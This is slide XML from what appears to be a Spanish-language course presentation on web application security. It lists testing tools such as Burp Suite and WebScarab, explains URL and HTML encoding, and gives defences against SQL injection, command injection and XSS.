              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Otras: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>XMLSpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, modela, edita, transforma, depura tecnologías relacionadas con XML.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25587420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Herramientas hacking Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Suite Professional: Una plataforma de pruebas de seguridad de aplicaciones Web que soporta un proceso de prueba entero, desde el mapeo iniciar para el análisis de una superficie de ataque, hasta encontrar y explotar vulnerabilidades de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Digger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>: Ayuda a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>identificar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>generaciones de cookie débiles e implementaciones inseguras para la administración de la sesión. Recoleta y analiza cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27467353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Herramientas hacking Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>WebScarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: Es un marco de trabajo para analizar aplicaciones que comunican utilizando protocolos HTTP y HTTPS. Permite al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>atacante revisar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>y modificar solicitudes, y respuestas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39969307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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las aplicaciones Web utilizan distintos esquemas de codificación para que sus datos manipulen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>inusuales de manera segura y datos binarios de manera segura. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13296198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Contramedidas</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3d =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0a Nueva línea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20 espacio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300852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Amenazas a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Almacenamiento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>inseguro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Fuga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de información.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de manipulación errónea.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Administración </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de cuenta violada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Transversal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Manipulación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de parámetros/formularios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1852177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Contramedidas</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; &lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; &gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7162667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Contramedidas</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Esquemas de codificación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Unicode 16 bits, UTF-8, Base64, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7210592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defenderse contra ataques SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Limitar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>longitud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>de entrada del usuario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>mensajes de error personalizados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Monitorear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>el tráfico DB utilizando IDS, WAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Deshabilitar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>comandos como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Aislar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>el servidor DB y el servidor Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Siempre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>utilizar el atributo del método establecido en POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Ejecutar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>la cuenta del servicio de DB con mínimos derechos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36130920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sz="4800" dirty="0"/>
              <a:t>¿Cómo defenderse contra ataques SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4800" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="4800" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Mover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>los procedimientos almacenados en un servidor aislado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>variables seguras o funciones como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>IsNumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>() para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>asegurar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>el tipo de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Validar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>y desinfectar las entradas pasadas del usuario a la base de datos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>una cuenta con bajos privilegios para conectar la DB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11371548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sz="4000" dirty="0"/>
              <a:t>¿Cómo defenderse contra las fallas de inyección de comandos?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Realizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>validación de entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>librerías de lenguaje específicas que impidan problemas debido a los comandos de consola.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>API segura que impide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>enteramente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>el uso de un interpretador.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>consultas SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>parametizadas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Escapar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>a los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>peligrosos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Realizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>codificación de entrada y salida.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>desasociación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> modular de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>consulta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>desde el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25362310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defenderse contra ataques XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Validar todos los encabezados, cookies, cadenas de consultas, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Filtrar la salida de scripts puede también anular las vulnerabilidades XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Codificar la entrada y salida y filtrar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Meta en la entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Utilizar firewall de aplicación para bloquear la ejecución de script malicioso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>confíes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>siempre en sitios que utilicen HTTPS cuando se trate de XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15590151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¿Cómo defenderse contra ataques XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
